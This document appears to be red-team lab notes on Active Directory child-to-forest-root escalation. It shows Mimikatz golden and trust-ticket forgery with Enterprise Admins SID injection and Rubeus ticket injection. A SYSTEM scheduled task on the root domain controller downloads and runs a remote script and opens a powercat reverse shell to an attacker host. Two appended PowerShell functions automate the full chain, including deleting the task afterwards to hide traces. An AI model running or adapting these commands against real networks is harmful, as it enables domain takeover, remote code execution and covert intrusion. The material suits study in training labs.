Escalating from child to parent domain

Domains in the same forest have an implicit two-way transitive trust with every other domain in the forest. Each parent-child trust is backed by a shared trust key (the password of the inter-domain trust account), which is what the child KDC uses to encrypt inter-realm TGTs that refer a user to the parent domain. Because SID filtering is not enforced on intra-forest trusts, a forged ticket that carries the forest root's Enterprise Admins SID in its SID history is honoured by the root domain.

There are two ways of escalating privileges between two domains of the same forest, both of which require Domain Admin rights in the child domain and both of which abuse SID history (the /sids field below) to inject the Enterprise Admins SID (forest root domain SID + RID 519):

  • Krbtgt hash

  • Trust tickets

Method 1: Trust ticket

Child to Forest Root using trust tickets requires the trust key of the child-to-parent trust. Dump it from the child DC (needs DA in the child domain); in the lsadump::trust output, look for the [ In ] key of the trust from the child to the parent:

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc

Forging trust ticket

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:[child domain] /sid:[sid of child domain] /sids:[sid of parent domain]-519 /rc4:[trust key] /service:krbtgt /target:[parent domain] /ticket:[ticket name]"'

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:b543d42b31a43e9eab1466fe5ae8e0e3 /service:krbtgt /target:moneycorp.local /ticket:trust.kirbi"'

Invoke-Rubeus -Command "asktgs /ticket:[trust ticket name] /service:CIFS/[parent domain controller FQDN] /dc:[parent domain controller FQDN] /outfile:[trust name]"

Invoke-Rubeus -Command "asktgs /ticket:trust.kirbi /service:CIFS/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /outfile:mcorpEA.kirbi"

Invoke-Rubeus -Command "ptt /ticket:[ticket name]"

Invoke-Rubeus -Command "ptt /ticket:mcorpEA.kirbi"

ls \\mcorp-dc.moneycorp.local\c$

Method 2: Krbtgt hash

Requires the NTLM hash of the child domain's krbtgt account (dumped from the child DC with DA rights). A golden ticket for the child domain is forged with the Enterprise Admins SID of the forest root in its SID history and injected directly with /ptt; the child and parent KDCs then perform the cross-realm referral themselves, so no trust key or separate service ticket request is needed.

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:[child domain] /sid:[sid of child domain] /sids:[sid of parent domain]-519 /krbtgt:[krbtgt hash] /ptt"'

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ptt"'
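The two methods above, wrapped as an added example (not code from the original notes) in one PowerShell function that looks up the child and forest-root domain SIDs itself instead of relying on hand-copied values, validates the secret, and checks the result by opening the root DC's admin share. It assumes Invoke-Mimikatz and Invoke-Rubeus are already loaded in the session, that the current user is a Domain Admin in the child domain, and that LDAP binds to the parent domain work over the trust; the function and parameter names (Get-DomainSid, Invoke-ChildToRootEscalation, -RootDC) are hypothetical. For Method 1 it uses Rubeus' asktgs /ptt, which injects the CIFS ticket in one step instead of the /outfile + ptt pair shown above.

```powershell
# Added example, not part of the original notes. Assumes Invoke-Mimikatz and
# Invoke-Rubeus are loaded and the caller is DA in the child domain.

function Get-DomainSid {
    param([Parameter(Mandatory)][string]$DomainDns)
    # objectSid of the domain head object, read over LDAP (serverless bind is
    # resolved through the trust; no RSAT module needed)
    $entry = [ADSI]"LDAP://$DomainDns"
    $bytes = $entry.Properties["objectSid"].Value
    (New-Object System.Security.Principal.SecurityIdentifier($bytes, 0)).Value
}

function Invoke-ChildToRootEscalation {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][ValidateSet('TrustKey', 'Krbtgt')][string]$Method,
        # RC4 trust key (TrustKey) or child krbtgt NTLM hash (Krbtgt): 32 hex chars
        [Parameter(Mandatory)][ValidatePattern('^[0-9a-fA-F]{32}$')][string]$Hash,
        [Parameter(Mandatory)][string]$RootDC,          # e.g. mcorp-dc.moneycorp.local
        [string]$User = 'Administrator',
        [string]$TicketPath = "$env:TEMP\trust.kirbi"
    )

    $child = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
    $root  = $child.Forest.RootDomain
    if ($child.Name -eq $root.Name) { throw "Already in the forest root domain ($($root.Name))" }

    $childSid = Get-DomainSid $child.Name
    $rootSid  = Get-DomainSid $root.Name
    # Enterprise Admins (RID 519) exists only in the forest root; placing its SID
    # in the forged ticket's SID history is what grants admin on the root domain.
    $eaSid = "$rootSid-519"

    if ($Method -eq 'TrustKey') {
        # Method 1: forge an inter-realm TGT encrypted with the trust key, then
        # exchange it at the root DC for a CIFS service ticket and inject that.
        $forge = "kerberos::golden /user:$User /domain:$($child.Name) /sid:$childSid " +
                 "/sids:$eaSid /rc4:$Hash /service:krbtgt /target:$($root.Name) /ticket:$TicketPath"
        Invoke-Mimikatz -Command "`"$forge`""
        if (-not (Test-Path $TicketPath)) { throw "mimikatz did not write $TicketPath" }
        Invoke-Rubeus -Command "asktgs /ticket:$TicketPath /service:CIFS/$RootDC /dc:$RootDC /ptt"
    }
    else {
        # Method 2: golden ticket for the child domain carrying the EA SID in
        # SID history; /ptt injects it and the KDCs handle the cross-realm referral.
        $forge = "kerberos::golden /user:$User /domain:$($child.Name) /sid:$childSid " +
                 "/sids:$eaSid /krbtgt:$Hash /ptt"
        Invoke-Mimikatz -Command "`"$forge`""
    }

    # Verification: the injected ticket should now open the root DC's C$ share.
    $access = Test-Path "\\$RootDC\c$"
    [pscustomobject]@{
        Method       = $Method
        ChildDomain  = $child.Name
        ChildSid     = $childSid
        ExtraSid     = $eaSid
        RootDCAccess = $access
    }
}

# Usage (values from the lab above):
# Invoke-ChildToRootEscalation -Method TrustKey -Hash b543d42b31a43e9eab1466fe5ae8e0e3 -RootDC mcorp-dc.moneycorp.local
# Invoke-ChildToRootEscalation -Method Krbtgt   -Hash ff46a9d8bd66c6efd77603da26796f35 -RootDC mcorp-dc.moneycorp.local
```

If RootDCAccess comes back false, check klist for the injected ticket first: with Method 1 the most common cause is using the [ Out ] key instead of the [ In ] key, and with Method 2 a stale krbtgt hash after a krbtgt password rotation.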

Remote code execution on forest root domain controller

## Verify admin rights on the root DC (WMI over DCOM; returns access denied unless the injected ticket is honoured)
gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local

## Create scheduled task
schtasks /create /S mcorp-dc.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (iwr http://172.16.99.45/crtp/exploit_rev/enc_power.ps1 -UseBasicParsing); powercat -c 172.16.99.45 -p 9002 -ep'"

## Execute scheduled task
schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
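The scheduled-task RCE above as an added example (not code from the original notes) that adds what the bare three commands lack: an exit-code check after each schtasks call, a look at the task's last run result, and deletion of the task afterwards so it does not stay behind on the root DC. The function name Invoke-RootDcTask and its parameters are hypothetical; the payload passed in -Command is whatever the notes above use (the powercat one-liner) and is not assumed here.

```powershell
# Added example, not part of the original notes. Runs a one-shot command as
# SYSTEM on the root DC through a scheduled task and removes the task again.

function Invoke-RootDcTask {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$RootDC,            # e.g. mcorp-dc.moneycorp.local
        [Parameter(Mandatory)][string]$Command,           # command line the task runs
        [string]$TaskName = ("STCheck{0:D3}" -f (Get-Random -Maximum 1000)),
        [int]$WaitSeconds = 15
    )

    # Pre-flight check, same as the gwmi call in the notes: fails with access
    # denied unless the ticket currently injected grants admin on the DC.
    $null = Get-WmiObject -Class Win32_OperatingSystem -ComputerName $RootDC -ErrorAction Stop

    # /F overwrites an existing task of the same name instead of erroring out.
    schtasks /Create /S $RootDC /SC Weekly /RU "NT Authority\SYSTEM" /TN $TaskName /TR $Command /F | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "schtasks /Create failed on $RootDC (exit $LASTEXITCODE)" }

    try {
        schtasks /Run /S $RootDC /TN $TaskName | Out-Null
        if ($LASTEXITCODE -ne 0) { throw "schtasks /Run failed on $RootDC (exit $LASTEXITCODE)" }

        # Give the task time to start the payload, then read its last run result.
        Start-Sleep -Seconds $WaitSeconds
        $query = schtasks /Query /S $RootDC /TN $TaskName /FO LIST /V
        $lastResult = ($query | Where-Object { $_ -match '^Last Result:\s*(.+)$' } |
                       ForEach-Object { $Matches[1].Trim() } | Select-Object -First 1)
    }
    finally {
        # Always remove the task; a weekly SYSTEM task left on a DC is an obvious artefact.
        schtasks /Delete /S $RootDC /TN $TaskName /F | Out-Null
    }

    [pscustomobject]@{
        RootDC     = $RootDC
        TaskName   = $TaskName
        LastResult = $lastResult   # "0" means the task launched the command cleanly
    }
}

# Usage (payload string as in the notes above, listener assumed to be waiting):
# Invoke-RootDcTask -RootDC mcorp-dc.moneycorp.local -Command "powershell.exe -c 'iex (iwr http://172.16.99.45/crtp/exploit_rev/enc_power.ps1 -UseBasicParsing); powercat -c 172.16.99.45 -p 9002 -ep'"
```

A Last Result of 0 only means the task process started; whether the reverse shell came back is seen on the listener, not in schtasks output.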
